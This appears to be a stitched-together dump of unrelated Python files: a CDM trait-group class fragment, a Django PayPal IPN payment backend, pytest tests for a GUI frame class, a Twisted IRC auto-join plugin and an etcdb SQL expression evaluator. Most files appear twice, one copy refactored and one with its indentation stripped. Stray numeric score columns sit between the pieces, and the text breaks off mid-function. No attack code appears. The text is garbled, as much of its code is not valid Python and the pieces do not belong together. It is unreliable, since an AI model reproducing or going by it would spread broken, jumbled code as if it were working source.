self.trait_group_name = trait_group_name # type: str
@property
def object_type(self) -> CdmObjectType:
return CdmObjectType.TRAIT_GROUP_DEF
def get_name(self):
return self.trait_group_name
def copy(self, res_opt: Optional['ResolveOptions'] = None, host: Optional['CdmTraitGroupDefinition'] = None) \
-> 'CdmTraitGroupDefinition':
if not res_opt:
res_opt = ResolveOptions(wrt_doc=self, directives=self.ctx.corpus.default_resolution_directives)
if not host:
copy = CdmTraitGroupDefinition(self.ctx, self.trait_group_name)
else:
copy = host
copy.trait_group_name = self.trait_group_name
self._copy_def(res_opt, copy)
return copy
def validate(self) -> bool:
if not bool(self.trait_group_name):
missing_fields = ['trait_group_name']
logger.error(self.ctx, self._TAG, 'validate', self.at_corpus_path,
CdmLogCode.ERR_VALDN_INTEGRITY_CHECK_FAILURE, self.at_corpus_path,
', '.join(map(lambda s: '\'' + s + '\'', missing_fields)))
return False
return True
def is_derived_from(self, base: str, res_opt: Optional['ResolveOptions'] = None) -> bool:
return False
def visit(self, path_from: str, pre_children: 'VisitCallback', post_children: 'VisitCallback') -> bool:
path = ''
if self.ctx.corpus._block_declared_path_changes is False:
path = self._declared_path
if not path:
path = path_from + self.trait_group_name
self._declared_path = path
if pre_children and pre_children(self, path):
return False
if self._visit_def(path, pre_children, post_children):
return True
if post_children and post_children(self, path):
return True
return False
def _construct_resolved_traits(self, rtsb: 'ResolvedTraitSetBuilder', res_opt: 'ResolveOptions') -> None:
super()._construct_resolved_traits_def(None, rtsb, res_opt)
def _construct_resolved_attributes(self, res_opt: 'ResolveOptions', under: Optional['CdmAttributeContext'] = None) \
-> None:
return None | 0.914549 | 0.11694 |
from decimal import Decimal
from urllib.parse import urlencode
from urllib.request import urlopen

from django.conf import settings as project_settings
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from django.utils.translation import ugettext_lazy as _

from .base import BackendBase
class PaypalBackend(BackendBase):
    """Payment backend redirecting users to PayPal and handling IPN callbacks.

    Supports one-off payments (``_xclick``) and recurring subscriptions
    (``_xclick-subscriptions``).  PayPal confirms transactions asynchronously
    through Instant Payment Notifications (IPN), which are validated against
    the PayPal API before being trusted.
    """

    backend_id = 'paypal'
    backend_verbose_name = _("PayPal")
    backend_display_name = _("PayPal")
    backend_has_recurring = True

    def __init__(self, settings):
        """Configure the backend from the project's PayPal settings dict."""
        self.test = settings.get('TEST', False)
        self.header_image = settings.get('HEADER_IMAGE', None)
        self.title = settings.get('TITLE', 'VPN Payment')
        self.currency = settings.get('CURRENCY', 'EUR')
        self.account_address = settings.get('ADDRESS')
        # Payments may be received on a different address than the account.
        self.receiver_address = settings.get('RECEIVER', self.account_address)
        if self.test:
            default_api = 'https://www.sandbox.paypal.com/'
        else:
            default_api = 'https://www.paypal.com/'
        self.api_base = settings.get('API_BASE', default_api)
        if self.account_address:
            self.backend_enabled = True

    def new_payment(self, payment):
        """Redirect the user to PayPal checkout for a one-off payment."""
        ROOT_URL = project_settings.ROOT_URL
        params = {
            'cmd': '_xclick',
            'notify_url': ROOT_URL + reverse('payments:cb_paypal', args=(payment.id,)),
            'item_name': self.title,
            # Amounts are stored in cents; PayPal expects decimal units.
            'amount': '%.2f' % (payment.amount / 100),
            'currency_code': self.currency,
            'business': self.account_address,
            'no_shipping': '1',
            'return': ROOT_URL + reverse('payments:view', args=(payment.id,)),
            'cancel_return': ROOT_URL + reverse('payments:cancel', args=(payment.id,)),
        }
        if self.header_image:
            params['cpp_header_image'] = self.header_image
        payment.status_message = _("Waiting for PayPal to confirm the transaction... " +
                                   "It can take up to a few minutes...")
        payment.save()
        return redirect(self.api_base + '/cgi-bin/webscr?' + urlencode(params))

    def new_subscription(self, rps):
        """Redirect the user to PayPal to set up a recurring subscription."""
        months = {
            '3m': 3,
            '6m': 6,
            '12m': 12,
        }[rps.period]
        ROOT_URL = project_settings.ROOT_URL
        params = {
            'cmd': '_xclick-subscriptions',
            'notify_url': ROOT_URL + reverse('payments:cb_paypal_subscr', args=(rps.id,)),
            'item_name': self.title,
            'currency_code': self.currency,
            'business': self.account_address,
            'no_shipping': '1',
            'return': ROOT_URL + reverse('payments:return_subscr', args=(rps.id,)),
            'cancel_return': ROOT_URL + reverse('account:index'),
            # a3/p3/t3: recurring amount, period length, period unit (months);
            # src=1 makes the subscription recur automatically.
            'a3': '%.2f' % (rps.period_amount / 100),
            'p3': str(months),
            't3': 'M',
            'src': '1',
        }
        if self.header_image:
            params['cpp_header_image'] = self.header_image
        rps.save()
        return redirect(self.api_base + '/cgi-bin/webscr?' + urlencode(params))

    def handle_verified_callback(self, payment, params):
        """Process a verified IPN for a one-off payment."""
        if self.test and params['test_ipn'] != '1':
            raise ValueError('Test IPN')
        txn_type = params.get('txn_type')
        if txn_type not in (None, 'web_accept', 'express_checkout'):
            # Not handled here and can be ignored
            return
        if params['payment_status'] == 'Refunded':
            payment.status = 'refunded'
            payment.status_message = None
        elif params['payment_status'] == 'Completed':
            self.handle_completed_payment(payment, params)

    def handle_verified_callback_subscr(self, subscr, params):
        """Process a verified IPN for a recurring payment subscription."""
        if self.test and params['test_ipn'] != '1':
            raise ValueError('Test IPN')
        txn_type = params.get('txn_type')
        # txn_type may be missing entirely; only subscr_* events are ours.
        if not txn_type or not txn_type.startswith('subscr_'):
            # Not handled here and can be ignored
            return
        if txn_type == 'subscr_payment':
            if params['payment_status'] == 'Refunded':
                # FIXME: Find the payment and do something
                pass
            elif params['payment_status'] == 'Completed':
                payment = subscr.create_payment()
                if not self.handle_completed_payment(payment, params):
                    return
                subscr.last_confirmed_payment = payment.created
                subscr.backend_extid = params.get('subscr_id', '')
                if subscr.status == 'new' or subscr.status == 'unconfirmed':
                    subscr.status = 'active'
                subscr.save()
        elif txn_type == 'subscr_cancel' or txn_type == 'subscr_eot':
            subscr.status = 'cancelled'
            subscr.save()

    def handle_completed_payment(self, payment, params):
        """Mark *payment* confirmed and credit the user's paid time.

        Returns False when this IPN was already processed (duplicate txn_id),
        True on success.  Raises ValueError on receiver/currency/amount
        mismatch so callers can flag the payment as errored.
        """
        from payments.models import Payment

        # Prevent making duplicate Payments if IPN is received twice
        pc = Payment.objects.filter(backend_extid=params['txn_id']).count()
        if pc > 0:
            return False
        if self.receiver_address != params['receiver_email']:
            raise ValueError('Wrong receiver: ' + params['receiver_email'])
        if self.currency.lower() != params['mc_currency'].lower():
            raise ValueError('Wrong currency: ' + params['mc_currency'])
        # Decimal avoids float truncation (e.g. 19.99 * 100 -> 1998.99...,
        # which int() would truncate to 1998 and reject a fully-paid payment).
        payment.paid_amount = int(Decimal(params['mc_gross']) * 100)
        if payment.paid_amount < payment.amount:
            raise ValueError('Not fully paid.')
        payment.user.vpnuser.add_paid_time(payment.time)
        payment.user.vpnuser.on_payment_confirmed(payment)
        payment.user.vpnuser.save()
        payment.backend_extid = params['txn_id']
        payment.status = 'confirmed'
        payment.status_message = None
        payment.save()
        return True

    def verify_ipn(self, request):
        """Echo the raw IPN body back to PayPal; True when it answers VERIFIED."""
        v_url = self.api_base + '/cgi-bin/webscr?cmd=_notify-validate'
        # Context manager ensures the HTTP response is closed (was leaked).
        with urlopen(v_url, data=request.body, timeout=5) as v_req:
            v_res = v_req.read()
        return v_res == b'VERIFIED'

    def callback(self, payment, request):
        """Entry point for one-off payment IPNs; records failures on the payment."""
        if not self.verify_ipn(request):
            return False
        params = request.POST
        try:
            self.handle_verified_callback(payment, params)
            return True
        except (KeyError, ValueError) as e:
            payment.status = 'error'
            payment.status_message = None
            payment.backend_data['ipn_exception'] = repr(e)
            payment.backend_data['ipn_last_data'] = repr(request.POST)
            payment.save()
            raise

    def callback_subscr(self, subscr, request):
        """Entry point for subscription IPNs; records failures on the subscription."""
        if not self.verify_ipn(request):
            return False
        params = request.POST
        try:
            self.handle_verified_callback_subscr(subscr, params)
            return True
        except (KeyError, ValueError) as e:
            subscr.status = 'error'
            subscr.status_message = None
            subscr.backend_data['ipn_exception'] = repr(e)
            subscr.backend_data['ipn_last_data'] = repr(request.POST)
            subscr.save()
            raise

    def get_ext_url(self, payment):
        """Return the PayPal transaction-history URL for *payment*, if any."""
        if not payment.backend_extid:
            return None
        url = 'https://history.paypal.com/webscr?cmd=_history-details-from-hub&id=%s'
        return url % payment.backend_extid

    def get_subscr_ext_url(self, subscr):
        """Return the PayPal recurring-profile URL for *subscr*, if any."""
        if not subscr.backend_extid:
            return None
        return ('https://www.paypal.com/fr/cgi-bin/webscr?cmd=_profile-recurring-payments'
                '&encrypted_profile_id=%s' % subscr.backend_extid)
from django.utils.translation import ugettext_lazy as _
from urllib.parse import urlencode
from urllib.request import urlopen
from django.core.urlresolvers import reverse
from django.conf import settings as project_settings
from .base import BackendBase
class PaypalBackend(BackendBase):
backend_id = 'paypal'
backend_verbose_name = _("PayPal")
backend_display_name = _("PayPal")
backend_has_recurring = True
def __init__(self, settings):
self.test = settings.get('TEST', False)
self.header_image = settings.get('HEADER_IMAGE', None)
self.title = settings.get('TITLE', 'VPN Payment')
self.currency = settings.get('CURRENCY', 'EUR')
self.account_address = settings.get('ADDRESS')
self.receiver_address = settings.get('RECEIVER', self.account_address)
if self.test:
default_api = 'https://www.sandbox.paypal.com/'
else:
default_api = 'https://www.paypal.com/'
self.api_base = settings.get('API_BASE', default_api)
if self.account_address:
self.backend_enabled = True
def new_payment(self, payment):
ROOT_URL = project_settings.ROOT_URL
params = {
'cmd': '_xclick',
'notify_url': ROOT_URL + reverse('payments:cb_paypal', args=(payment.id,)),
'item_name': self.title,
'amount': '%.2f' % (payment.amount / 100),
'currency_code': self.currency,
'business': self.account_address,
'no_shipping': '1',
'return': ROOT_URL + reverse('payments:view', args=(payment.id,)),
'cancel_return': ROOT_URL + reverse('payments:cancel', args=(payment.id,)),
}
if self.header_image:
params['cpp_header_image'] = self.header_image
payment.status_message = _("Waiting for PayPal to confirm the transaction... " +
"It can take up to a few minutes...")
payment.save()
return redirect(self.api_base + '/cgi-bin/webscr?' + urlencode(params))
def new_subscription(self, rps):
months = {
'3m': 3,
'6m': 6,
'12m': 12,
}[rps.period]
ROOT_URL = project_settings.ROOT_URL
params = {
'cmd': '_xclick-subscriptions',
'notify_url': ROOT_URL + reverse('payments:cb_paypal_subscr', args=(rps.id,)),
'item_name': self.title,
'currency_code': self.currency,
'business': self.account_address,
'no_shipping': '1',
'return': ROOT_URL + reverse('payments:return_subscr', args=(rps.id,)),
'cancel_return': ROOT_URL + reverse('account:index'),
'a3': '%.2f' % (rps.period_amount / 100),
'p3': str(months),
't3': 'M',
'src': '1',
}
if self.header_image:
params['cpp_header_image'] = self.header_image
rps.save()
return redirect(self.api_base + '/cgi-bin/webscr?' + urlencode(params))
def handle_verified_callback(self, payment, params):
if self.test and params['test_ipn'] != '1':
raise ValueError('Test IPN')
txn_type = params.get('txn_type')
if txn_type not in (None, 'web_accept', 'express_checkout'):
# Not handled here and can be ignored
return
if params['payment_status'] == 'Refunded':
payment.status = 'refunded'
payment.status_message = None
elif params['payment_status'] == 'Completed':
self.handle_completed_payment(payment, params)
def handle_verified_callback_subscr(self, subscr, params):
if self.test and params['test_ipn'] != '1':
raise ValueError('Test IPN')
txn_type = params.get('txn_type')
if not txn_type.startswith('subscr_'):
# Not handled here and can be ignored
return
if txn_type == 'subscr_payment':
if params['payment_status'] == 'Refunded':
# FIXME: Find the payment and do something
pass
elif params['payment_status'] == 'Completed':
payment = subscr.create_payment()
if not self.handle_completed_payment(payment, params):
return
subscr.last_confirmed_payment = payment.created
subscr.backend_extid = params.get('subscr_id', '')
if subscr.status == 'new' or subscr.status == 'unconfirmed':
subscr.status = 'active'
subscr.save()
elif txn_type == 'subscr_cancel' or txn_type == 'subscr_eot':
subscr.status = 'cancelled'
subscr.save()
def handle_completed_payment(self, payment, params):
from payments.models import Payment
# Prevent making duplicate Payments if IPN is received twice
pc = Payment.objects.filter(backend_extid=params['txn_id']).count()
if pc > 0:
return False
if self.receiver_address != params['receiver_email']:
raise ValueError('Wrong receiver: ' + params['receiver_email'])
if self.currency.lower() != params['mc_currency'].lower():
raise ValueError('Wrong currency: ' + params['mc_currency'])
payment.paid_amount = int(float(params['mc_gross']) * 100)
if payment.paid_amount < payment.amount:
raise ValueError('Not fully paid.')
payment.user.vpnuser.add_paid_time(payment.time)
payment.user.vpnuser.on_payment_confirmed(payment)
payment.user.vpnuser.save()
payment.backend_extid = params['txn_id']
payment.status = 'confirmed'
payment.status_message = None
payment.save()
return True
def verify_ipn(self, request):
v_url = self.api_base + '/cgi-bin/webscr?cmd=_notify-validate'
v_req = urlopen(v_url, data=request.body, timeout=5)
v_res = v_req.read()
return v_res == b'VERIFIED'
def callback(self, payment, request):
if not self.verify_ipn(request):
return False
params = request.POST
try:
self.handle_verified_callback(payment, params)
return True
except (KeyError, ValueError) as e:
payment.status = 'error'
payment.status_message = None
payment.backend_data['ipn_exception'] = repr(e)
payment.backend_data['ipn_last_data'] = repr(request.POST)
payment.save()
raise
def callback_subscr(self, subscr, request):
if not self.verify_ipn(request):
return False
params = request.POST
try:
self.handle_verified_callback_subscr(subscr, params)
return True
except (KeyError, ValueError) as e:
subscr.status = 'error'
subscr.status_message = None
subscr.backend_data['ipn_exception'] = repr(e)
subscr.backend_data['ipn_last_data'] = repr(request.POST)
subscr.save()
raise
def get_ext_url(self, payment):
if not payment.backend_extid:
return None
url = 'https://history.paypal.com/webscr?cmd=_history-details-from-hub&id=%s'
return url % payment.backend_extid
def get_subscr_ext_url(self, subscr):
if not subscr.backend_extid:
return None
return ('https://www.paypal.com/fr/cgi-bin/webscr?cmd=_profile-recurring-payments'
'&encrypted_profile_id=%s' % subscr.backend_extid) | 0.41052 | 0.077274 |
import pytest
from cuppak.component.abstract_frame import AbstractFrame
from cuppak.dto import *
##SET UP
class ConcreteAbstractFrame(AbstractFrame):
    """Minimal concrete subclass used to exercise AbstractFrame in the tests."""

    def __init__(self, window, columns, rows, **kw):
        super().__init__(window, columns, rows, **kw)

    def change_child_state(self, state):
        # Delegate straight to the base implementation.
        super().change_child_state(state)
##TESTS
def test_abstract_frame_not_instantiatable():
    """AbstractFrame is abstract: direct instantiation must raise TypeError."""
    # The exact wording varies across Python versions ("methods" vs "method"),
    # so match only the stable prefix instead of the full message.
    with pytest.raises(TypeError, match="Can't instantiate abstract class AbstractFrame"):
        AbstractFrame(None, [], [])
def test_abstract_frame_can_instantiate_concrete():
    """A subclass implementing the abstract methods can be constructed."""
    frame = ConcreteAbstractFrame(None, [], [])
    assert frame
def test_abstract_frame_handles_invalid_columns_parameters():
    """A non-list ``columns`` argument must be rejected with TypeError."""
    with pytest.raises(TypeError, match='columns must be a list'):
        ConcreteAbstractFrame(None, 1, [])
def test_abstract_frame_handles_invalid_rows_parameters():
    """A non-list ``rows`` argument must be rejected with TypeError."""
    with pytest.raises(TypeError, match='rows must be a list'):
        ConcreteAbstractFrame(None, [], 'dog')
def test_abstract_frame_alter_dimensions():
    """_alter_dimensions must update the stored column/row counts."""
    column_defs = [ColumnDefinition(2), ColumnDefinition(4), ColumnDefinition(1)]
    row_defs = [RowDefinition(1), RowDefinition(2), RowDefinition(1)]
    frame = ConcreteAbstractFrame(None, [], [])
    # A freshly built frame starts with empty dimensions.
    assert frame._columns == 0
    assert frame._rows == 0
    frame._alter_dimensions(column_defs, row_defs)
    assert frame._columns == len(column_defs)
    assert frame._rows == len(row_defs)
def test_abstract_frame_change_child_state():
    """change_child_state on a concrete frame must not raise."""
    frame = ConcreteAbstractFrame(None, [], [])
    frame.change_child_state('disabled')
from cuppak.component.abstract_frame import AbstractFrame
from cuppak.dto import *
##SET UP
class ConcreteAbstractFrame(AbstractFrame):
def __init__(self, window, columns, rows, **kw):
super().__init__(window, columns, rows, **kw)
def change_child_state(self, state):
super().change_child_state(state)
##TESTS
def test_abstract_frame_not_instantiatable():
expected_error = "Can't instantiate abstract class AbstractFrame " + \
'with abstract methods __init__, change_child_state'
try:
abstract_frame = AbstractFrame(None, [], [])
assert False
except TypeError as error:
assert str(error) == expected_error
def test_abstract_frame_can_instantiate_concrete():
concrete_frame = ConcreteAbstractFrame(None, [], [])
assert concrete_frame
def test_abstract_frame_handles_invalid_columns_parameters():
expected_error = 'columns must be a list'
try:
concrete_frame = ConcreteAbstractFrame(None, 1, [])
assert False
except TypeError as error:
assert str(error) == expected_error
def test_abstract_frame_handles_invalid_rows_parameters():
expected_error = 'rows must be a list'
try:
concrete_frame = ConcreteAbstractFrame(None, [], 'dog')
assert False
except TypeError as error:
assert str(error) == expected_error
def test_abstract_frame_alter_dimensions():
columns = [ColumnDefinition(2), ColumnDefinition(4), ColumnDefinition(1)]
rows = [RowDefinition(1), RowDefinition(2), RowDefinition(1)]
concrete_frame = ConcreteAbstractFrame(None, [], [])
assert concrete_frame._columns == 0
assert concrete_frame._rows == 0
concrete_frame._alter_dimensions(columns,rows)
assert concrete_frame._columns == len(columns)
assert concrete_frame._rows == len(rows)
def test_abstract_frame_change_child_state():
concrete_frame = ConcreteAbstractFrame(None, [], [])
concrete_frame.change_child_state('disabled') | 0.524395 | 0.584568 |
from twisted.internet import defer, reactor
from zope.interface import implements, classProvides
from automatron.backend.plugin import IAutomatronPluginFactory
from automatron.controller.client import IAutomatronSignedOnHandler, IAutomatronChannelJoinedHandler,\
IAutomatronChannelLeftHandler, IAutomatronChannelKickedHandler
class AutoJoinPlugin(object):
classProvides(IAutomatronPluginFactory)
implements(
IAutomatronSignedOnHandler,
IAutomatronChannelJoinedHandler,
IAutomatronChannelLeftHandler,
IAutomatronChannelKickedHandler,
)
name = 'auto_join'
priority = 100
def __init__(self, controller):
self.controller = controller
def on_signed_on(self, server):
return self._on_signed_on(server)
@defer.inlineCallbacks
def _on_signed_on(self, server):
channels, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels and channels.strip():
for channel in channels.split(','):
self._join_channel(server, channel.strip())
@defer.inlineCallbacks
def _join_channel(self, server, channel):
channel_key = yield self.controller.config.get_value('channel', server['server'], channel, 'key')
self.controller.join(server['server'], channel, channel_key)
def on_channel_joined(self, server, channel):
self._on_channel_joined(server, channel)
@defer.inlineCallbacks
def _on_channel_joined(self, server, channel):
track, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'track')
if track == 'false':
return
channels, channels_rel = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels_rel is None or channels_rel > 0:
channels = [c.strip() for c in (channels or '').split(',') if c.strip()]
if not channel in channels:
channels.append(channel)
self.controller.config.update_plugin_value(self, server['server'], None, 'join', ','.join(channels))
def on_channel_left(self, server, channel):
self._on_channel_left(server, channel)
@defer.inlineCallbacks
def _on_channel_left(self, server, channel):
track, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'track')
if track == 'false':
return
channels, channels_rel = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels_rel is not None and channels_rel > 0:
channels = [c.strip() for c in (channels or '').split(',') if c.strip()]
if channel in channels:
channels.remove(channel)
self.controller.config.update_plugin_value(self, server['server'], None, 'join', ','.join(channels))
def on_channel_kicked(self, server, channel, kicker, message):
reactor.callLater(3, self._join_channel, server, channel) | twisted/plugins/automatron_auto_join.py | from twisted.internet import defer, reactor
from zope.interface import implements, classProvides
from automatron.backend.plugin import IAutomatronPluginFactory
from automatron.controller.client import IAutomatronSignedOnHandler, IAutomatronChannelJoinedHandler,\
IAutomatronChannelLeftHandler, IAutomatronChannelKickedHandler
class AutoJoinPlugin(object):
classProvides(IAutomatronPluginFactory)
implements(
IAutomatronSignedOnHandler,
IAutomatronChannelJoinedHandler,
IAutomatronChannelLeftHandler,
IAutomatronChannelKickedHandler,
)
name = 'auto_join'
priority = 100
def __init__(self, controller):
self.controller = controller
def on_signed_on(self, server):
return self._on_signed_on(server)
@defer.inlineCallbacks
def _on_signed_on(self, server):
channels, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels and channels.strip():
for channel in channels.split(','):
self._join_channel(server, channel.strip())
@defer.inlineCallbacks
def _join_channel(self, server, channel):
channel_key = yield self.controller.config.get_value('channel', server['server'], channel, 'key')
self.controller.join(server['server'], channel, channel_key)
def on_channel_joined(self, server, channel):
self._on_channel_joined(server, channel)
@defer.inlineCallbacks
def _on_channel_joined(self, server, channel):
track, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'track')
if track == 'false':
return
channels, channels_rel = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels_rel is None or channels_rel > 0:
channels = [c.strip() for c in (channels or '').split(',') if c.strip()]
if not channel in channels:
channels.append(channel)
self.controller.config.update_plugin_value(self, server['server'], None, 'join', ','.join(channels))
def on_channel_left(self, server, channel):
self._on_channel_left(server, channel)
@defer.inlineCallbacks
def _on_channel_left(self, server, channel):
track, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'track')
if track == 'false':
return
channels, channels_rel = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels_rel is not None and channels_rel > 0:
channels = [c.strip() for c in (channels or '').split(',') if c.strip()]
if channel in channels:
channels.remove(channel)
self.controller.config.update_plugin_value(self, server['server'], None, 'join', ','.join(channels))
def on_channel_kicked(self, server, channel, kicker, message):
reactor.callLater(3, self._join_channel, server, channel) | 0.720172 | 0.08698 |
from etcdb import OperationalError, __version__
from etcdb.resultset import Column
from etcdb.sqlparser.parser import SQLParserError
class EtcdbFunction(object):
"""EtcdbFunction represents an SQL function.
:param function_name: python function that implements SQL function.
:type function_name: callable
:param group: True if the functions is aggregate function
:type group: bool
:param args: Arguments to pass to function_name
:param kwargs: Keyword arguments"""
def __init__(self, *args, **kwargs):
self._function = args[0]
self._group = kwargs.get('group', False)
self._args = args[1:]
@property
def function(self):
"""Return function name"""
return self._function
@property
def group(self):
"""Return whether the function is aggregate"""
return self._group
def __call__(self, *args, **kwargs):
return self._function(*args, **kwargs)
def __eq__(self, other):
return all(
(
isinstance(other, EtcdbFunction),
self.function == other.function,
self.group == other.group
)
)
def __ne__(self, other):
return not self.__eq__(other)
def eval_identifier(row, identifier):
"""
Get value of identifier for a given row
:param row: row
:type row: tuple(ColumnSet, Row)
:param identifier: Identifier
:type identifier: str
:return: value of identifier
"""
try:
identifier_strip = identifier.split('.')[1]
except IndexError:
identifier_strip = identifier
# If row isn't given return column name only
if row:
columns = row[0]
data = row[1]
else:
return identifier_strip, None
try:
pos = columns.index(Column(identifier_strip))
return identifier_strip, data[pos]
except ValueError:
raise OperationalError('Unknown identifier %s' % identifier_strip)
def eval_string(value):
"""Evaluate string token"""
return '%s' % value, value
def etcdb_version():
"""Get etcdb version"""
return __version__
def etcdb_count(result_set):
"""
Count rows in result set
:param result_set: ResultSet instance
:type result_set: ResultSet
:return: number of rows in ResultSet
:rtype: int
"""
return len(result_set.rows)
def eval_function_call(row, tree): # pylint: disable=unused-argument
"""Evaluate function call
:return: tuple with field name and EtcdbFunction instance"""
if tree == 'VERSION':
# func = EtcdbFunction(version, group=False)
return "VERSION()", EtcdbFunction(etcdb_version, group=False)
if tree == 'COUNT':
# func = EtcdbFunction(version, group=False)
return "COUNT(*)", EtcdbFunction(etcdb_count, group=True)
raise NotImplementedError('Unknown function %s' % tree)
def eval_simple_expr(row, tree):
"""Evaluate simple_expr"""
if tree[0] == 'IDENTIFIER':
return eval_identifier(row, tree[1])
elif tree[0] == 'STRING' or tree[0] == 'literal':
return eval_string(tree[1])
elif tree[0] == 'function_call':
return eval_function_call(row, tree[1])
elif tree[0] == 'expr':
return eval_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_bit_expr(row, tree):
"""Evaluate bit_expr"""
if tree[0] == 'simple_expr':
return eval_simple_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_predicate(row, tree):
"""Evaluate predicate"""
if tree[0] == 'bit_expr':
return eval_bit_expr(row, tree[1])
if tree[0] == 'IN':
simple_expr = eval_simple_expr(row, tree[1][1])
for expr_tree in tree[2]:
expr_value = eval_expr(row, expr_tree)
if expr_value[1] == simple_expr[1]:
return '%s IN (%s)' % (simple_expr[0], expr_value[0]), True
return '%s IN (expr)' % (simple_expr[0], ), False
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_bool_primary(row, tree): # pylint: disable=too-many-return-statements
"""Evaluate bool_primary"""
if tree[0] == 'IS NULL':
bool_primary1 = eval_bool_primary(row, tree[1])
return "%s IS NULL" % bool_primary1[0], \
bool_primary1[1] is None
elif tree[0] == 'IS NOT NULL':
bool_primary1 = eval_bool_primary(row, tree[1])
return "%s IS NOT NULL" % bool_primary1[0], \
bool_primary1[1] is not None
elif tree[0] == '=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s = %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] == bool_primary2[1]
)
elif tree[0] == '>=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s >= %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] >= bool_primary2[1]
)
elif tree[0] == '>':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s > %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] > bool_primary2[1]
)
elif tree[0] == '<=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s <= %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] <= bool_primary2[1]
)
elif tree[0] == '<':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s < %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] < bool_primary2[1]
)
elif tree[0] in ['<>', '!=']:
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s %s %s" % (bool_primary1[0], tree[0], bool_primary2[0]),
bool_primary1[1] != bool_primary2[1]
)
elif tree[0] == 'predicate':
return eval_predicate(row, tree[1])
elif tree[0] == 'bit_expr':
return eval_bit_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_expr(row, tree):
"""Evaluate expression
:return: Tuple with string representation and value.
For example, ('id', 5).
:rtype: tuple
"""
if tree[0] == 'OR':
expr1 = eval_expr(row, tree[1])
expr2 = eval_expr(row, tree[2])
return (
'%s OR %s' % (expr1[0], expr2[0]),
expr1[1] or expr2[1]
)
elif tree[0] == 'AND':
expr1 = eval_expr(row, tree[1])
expr2 = eval_expr(row, tree[2])
return (
'%s AND %s' % (expr1[0], expr2[0]),
expr1[1] and expr2[1]
)
elif tree[0] == 'NOT':
expr1 = eval_expr(row, tree[1])
return (
'NOT %s' % expr1[0],
not expr1[1]
)
elif tree[0] == 'bool_primary':
return eval_bool_primary(row, tree[1])
else:
raise SQLParserError('%r is not implemented' % tree[0]) | etcdb/eval_expr.py | from etcdb import OperationalError, __version__
from etcdb.resultset import Column
from etcdb.sqlparser.parser import SQLParserError
class EtcdbFunction(object):
"""EtcdbFunction represents an SQL function.
:param function_name: python function that implements SQL function.
:type function_name: callable
:param group: True if the functions is aggregate function
:type group: bool
:param args: Arguments to pass to function_name
:param kwargs: Keyword arguments"""
def __init__(self, *args, **kwargs):
self._function = args[0]
self._group = kwargs.get('group', False)
self._args = args[1:]
@property
def function(self):
"""Return function name"""
return self._function
@property
def group(self):
"""Return whether the function is aggregate"""
return self._group
def __call__(self, *args, **kwargs):
return self._function(*args, **kwargs)
def __eq__(self, other):
return all(
(
isinstance(other, EtcdbFunction),
self.function == other.function,
self.group == other.group
)
)
def __ne__(self, other):
return not self.__eq__(other)
def eval_identifier(row, identifier):
"""
Get value of identifier for a given row
:param row: row
:type row: tuple(ColumnSet, Row)
:param identifier: Identifier
:type identifier: str
:return: value of identifier
"""
try:
identifier_strip = identifier.split('.')[1]
except IndexError:
identifier_strip = identifier
# If row isn't given return column name only
if row:
columns = row[0]
data = row[1]
else:
return identifier_strip, None
try:
pos = columns.index(Column(identifier_strip))
return identifier_strip, data[pos]
except ValueError:
raise OperationalError('Unknown identifier %s' % identifier_strip)
def eval_string(value):
"""Evaluate string token"""
return '%s' % value, value
def etcdb_version():
"""Get etcdb version"""
return __version__
def etcdb_count(result_set):
"""
Count rows in result set
:param result_set: ResultSet instance
:type result_set: ResultSet
:return: number of rows in ResultSet
:rtype: int
"""
return len(result_set.rows)
def eval_function_call(row, tree): # pylint: disable=unused-argument
"""Evaluate function call
:return: tuple with field name and EtcdbFunction instance"""
if tree == 'VERSION':
# func = EtcdbFunction(version, group=False)
return "VERSION()", EtcdbFunction(etcdb_version, group=False)
if tree == 'COUNT':
# func = EtcdbFunction(version, group=False)
return "COUNT(*)", EtcdbFunction(etcdb_count, group=True)
raise NotImplementedError('Unknown function %s' % tree)
def eval_simple_expr(row, tree):
"""Evaluate simple_expr"""
if tree[0] == 'IDENTIFIER':
return eval_identifier(row, tree[1])
elif tree[0] == 'STRING' or tree[0] == 'literal':
return eval_string(tree[1])
elif tree[0] == 'function_call':
return eval_function_call(row, tree[1])
elif tree[0] == 'expr':
return eval_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_bit_expr(row, tree):
"""Evaluate bit_expr"""
if tree[0] == 'simple_expr':
return eval_simple_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_predicate(row, tree):
"""Evaluate predicate"""
if tree[0] == 'bit_expr':
return eval_bit_expr(row, tree[1])
if tree[0] == 'IN':
simple_expr = eval_simple_expr(row, tree[1][1])
for expr_tree in tree[2]:
expr_value = eval_expr(row, expr_tree)
if expr_value[1] == simple_expr[1]:
